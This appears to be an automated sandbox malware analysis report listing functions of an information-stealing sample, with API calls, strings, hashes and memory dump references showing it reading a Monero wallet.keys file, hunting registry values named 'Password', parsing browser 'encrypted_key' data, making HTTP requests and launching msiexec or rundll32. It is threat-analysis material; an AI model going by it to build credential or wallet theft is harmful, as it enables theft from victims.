                      • Opcode Fuzzy Hash: 97a0d58c23a03e6bb3667c0441e0505f14d7bcfed289e9c459fe3a8b0051ecd6
                      • Instruction Fuzzy Hash: 1241DBBAA40318A7DB51F7B0EC47FED7339AB24704F004554B249661C1EEB467C98B92
                      Function 003E9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                      Download Yara Rule
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 003E906C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: 234d7394e9fd7a41e8bf4f313bcab8564c3a729e9bd52a94fe0df2546f05f4db
                      • Instruction ID: d04c666a39fe9cc2381e03e4c8642cae2a1f6f23f392802a15537dd8d38be196
                      • Opcode Fuzzy Hash: 234d7394e9fd7a41e8bf4f313bcab8564c3a729e9bd52a94fe0df2546f05f4db
                      • Instruction Fuzzy Hash: B17110B5910218ABDF04DFE5DC89FEEB7B9BF48300F148609F615AB294DB34A905CB61
                      Function 003E2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 003E31C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 003E335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 003E34EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: da78bf17307d3c89b4b600e97af7495d21ca2cb116e9037babeb036f2d9f8f1f
                      • Instruction ID: cce7ae5dbaaa9211fa33086c048ee3cffa97bba2692cdcbd56537cdf316ee063
                      • Opcode Fuzzy Hash: da78bf17307d3c89b4b600e97af7495d21ca2cb116e9037babeb036f2d9f8f1f
                      • Instruction Fuzzy Hash: A4122271C005689ADB1AEB91DC92FEEB779AF14300F514259F5066A1D2EF303B4ACF62
                      Function 003E52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D6280: InternetOpenA.WININET(003F0DFE,00000001,00000000,00000000,00000000), ref: 003D62E1
                        • Part of subcall function 003D6280: StrCmpCA.SHLWAPI(?,0108E978), ref: 003D6303
                        • Part of subcall function 003D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003D6335
                        • Part of subcall function 003D6280: HttpOpenRequestA.WININET(00000000,GET,?,0108E0E8,00000000,00000000,00400100,00000000), ref: 003D6385
                        • Part of subcall function 003D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003D63BF
                        • Part of subcall function 003D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D63D1
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003E5318
                      • lstrlen.KERNEL32(00000000), ref: 003E532F
                        • Part of subcall function 003E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003E8E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 003E5364
                      • lstrlen.KERNEL32(00000000), ref: 003E5383
                      • lstrlen.KERNEL32(00000000), ref: 003E53AE
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 215dc53b24ab246608fb4b1298cda5e8ec4469092899bc6c0e9a5fd3184977e3
                      • Instruction ID: 3c9173994ce21f7ccf90db39fd7369d217bd86ef4c6ee0afe18abd43d8ebc620
                      • Opcode Fuzzy Hash: 215dc53b24ab246608fb4b1298cda5e8ec4469092899bc6c0e9a5fd3184977e3
                      • Instruction Fuzzy Hash: 58513B30910698EBDB16EFA1D992BED377AAF10304F514228E4065E5D2EF347B05DB62
                      Function 003E12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: 845ab76abf8abcabbbbeeca5a5f7ce55a79698227e40c223602bf36a8f04a750
                      • Instruction ID: 0f642967c1ba79667d88152fd10e6e957409be68fc10c5a5cd200999d5fe4854
                      • Opcode Fuzzy Hash: 845ab76abf8abcabbbbeeca5a5f7ce55a79698227e40c223602bf36a8f04a750
                      • Instruction Fuzzy Hash: 9BC1B7B5D0026C9BCB15EF61DC89FEA7779BF54304F004699F10A9B182DB70AA85CF91
                      Function 003E4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003E8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 003E42EC
                      • lstrcat.KERNEL32(?,0108E388), ref: 003E430B
                      • lstrcat.KERNEL32(?,?), ref: 003E431F
                      • lstrcat.KERNEL32(?,0108D0A8), ref: 003E4333
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003E8D90: GetFileAttributesA.KERNEL32(00000000,?,003D1B54,?,?,003F564C,?,?,003F0E1F), ref: 003E8D9F
                        • Part of subcall function 003D9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003D9D39
                        • Part of subcall function 003D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                        • Part of subcall function 003D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                        • Part of subcall function 003D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                        • Part of subcall function 003D99C0: ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                        • Part of subcall function 003D99C0: LocalFree.KERNEL32(003D148F), ref: 003D9A90
                        • Part of subcall function 003D99C0: CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                        • Part of subcall function 003E93C0: GlobalAlloc.KERNEL32(00000000,003E43DD,003E43DD), ref: 003E93D3
                      • StrStrA.SHLWAPI(?,0108E178), ref: 003E43F3
                      • GlobalFree.KERNEL32(?), ref: 003E4512
                        • Part of subcall function 003D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9AEF
                        • Part of subcall function 003D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003D4EEE,00000000,?), ref: 003D9B01
                        • Part of subcall function 003D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9B2A
                        • Part of subcall function 003D9AC0: LocalFree.KERNEL32(?,?,?,?,003D4EEE,00000000,?), ref: 003D9B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 003E44A3
                      • StrCmpCA.SHLWAPI(?,003F08D1), ref: 003E44C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 003E44D2
                      • lstrcat.KERNEL32(00000000,?), ref: 003E44E5
                      • lstrcat.KERNEL32(00000000,003F0FB8), ref: 003E44F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: b30d62466bc615d29ea7c93bb85b27ff61f7bbb3260ee048e6bc81953eeef3a6
                      • Instruction ID: c52b9048bb567bbff76809d4f5d45771607df9be0858c5b59e83186e92ed6cb5
                      • Opcode Fuzzy Hash: b30d62466bc615d29ea7c93bb85b27ff61f7bbb3260ee048e6bc81953eeef3a6
                      • Instruction Fuzzy Hash: 697146B6D00218ABDB15EBE1DC95FEE7379AB48300F048699F609971C1EA34EB45CF91
                      Function 003D1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003D12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D12B4
                        • Part of subcall function 003D12A0: RtlAllocateHeap.NTDLL(00000000), ref: 003D12BB
                        • Part of subcall function 003D12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003D12D7
                        • Part of subcall function 003D12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003D12F5
                        • Part of subcall function 003D12A0: RegCloseKey.ADVAPI32(?), ref: 003D12FF
                      • lstrcat.KERNEL32(?,00000000), ref: 003D134F
                      • lstrlen.KERNEL32(?), ref: 003D135C
                      • lstrcat.KERNEL32(?,.keys), ref: 003D1377
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E8B60: GetSystemTime.KERNEL32(003F0E1A,0108A3A0,003F05AE,?,?,003D13F9,?,0000001A,003F0E1A,00000000,?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003E8B86
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 003D1465
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                        • Part of subcall function 003D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                        • Part of subcall function 003D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                        • Part of subcall function 003D99C0: ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                        • Part of subcall function 003D99C0: LocalFree.KERNEL32(003D148F), ref: 003D9A90
                        • Part of subcall function 003D99C0: CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 003D14EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: b3cd49206bcbeb529aabb6ea1208f1e338a298512fa5ad228e9ad93de9088247
                      • Instruction ID: 332a09b1476f6257220748b5bd5aa44f984ddf0e677816695092da0831946f4b
                      • Opcode Fuzzy Hash: b3cd49206bcbeb529aabb6ea1208f1e338a298512fa5ad228e9ad93de9088247
                      • Instruction Fuzzy Hash: D15178B1D1016857DB16FB61DC91FED737D9F50300F404299B20A660C2EF306B89CB96
                      Function 003D75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003D72D0: memset.MSVCRT ref: 003D7314
                        • Part of subcall function 003D72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003D733A
                        • Part of subcall function 003D72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003D73B1
                        • Part of subcall function 003D72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003D740D
                        • Part of subcall function 003D72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 003D7452
                        • Part of subcall function 003D72D0: HeapFree.KERNEL32(00000000), ref: 003D7459
                      • lstrcat.KERNEL32(00000000,003F17FC), ref: 003D7606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 003D7648
                      • lstrcat.KERNEL32(00000000, : ), ref: 003D765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 003D768F
                      • lstrcat.KERNEL32(00000000,003F1804), ref: 003D76A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 003D76D3
                      • lstrcat.KERNEL32(00000000,003F1808), ref: 003D76ED
                      • task.LIBCPMTD ref: 003D76FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: :
                      • API String ID: 3191641157-3653984579
                      • Opcode ID: 97fed061256770b872488eac567bb73c835449521dd9640e8dfddd466c9a4493
                      • Instruction ID: b61eed8ecccd24c59d83822efa968b7a26c5656e2ed10e1b3066cf2315c02a91
                      • Opcode Fuzzy Hash: 97fed061256770b872488eac567bb73c835449521dd9640e8dfddd466c9a4493
                      • Instruction Fuzzy Hash: 703143B6A01109DFCB46EBF4EC95DFF7779BB44301B14911AF102AB390EA34A946CB91
                      Function 003D72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 003D7314
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003D733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003D73B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003D740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 003D7452
                      • HeapFree.KERNEL32(00000000), ref: 003D7459
                      • task.LIBCPMTD ref: 003D7555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: Password
                      • API String ID: 2808661185-3434357891
                      • Opcode ID: 0ef21ac4340fe475e83a09cebd09834930fb4093f58331d34ecc7c0bca7d92e8
                      • Instruction ID: b9ee2bfabbf702b86e285e2b925778e72460c6cfd9bdd0f12631d26f21995a64
                      • Opcode Fuzzy Hash: 0ef21ac4340fe475e83a09cebd09834930fb4093f58331d34ecc7c0bca7d92e8
                      • Instruction Fuzzy Hash: A0613EB690416C9BDB26DF50DC45BD9B7B8BF44300F0081EAE649AA241EB706FC9CF91
                      Function 003E8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0108DE78,00000000,?,003F0E2C,00000000,?,00000000), ref: 003E8130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E8137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003E8158
                      • __aulldiv.LIBCMT ref: 003E8172
                      • __aulldiv.LIBCMT ref: 003E8180
                      • wsprintfA.USER32 ref: 003E81AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
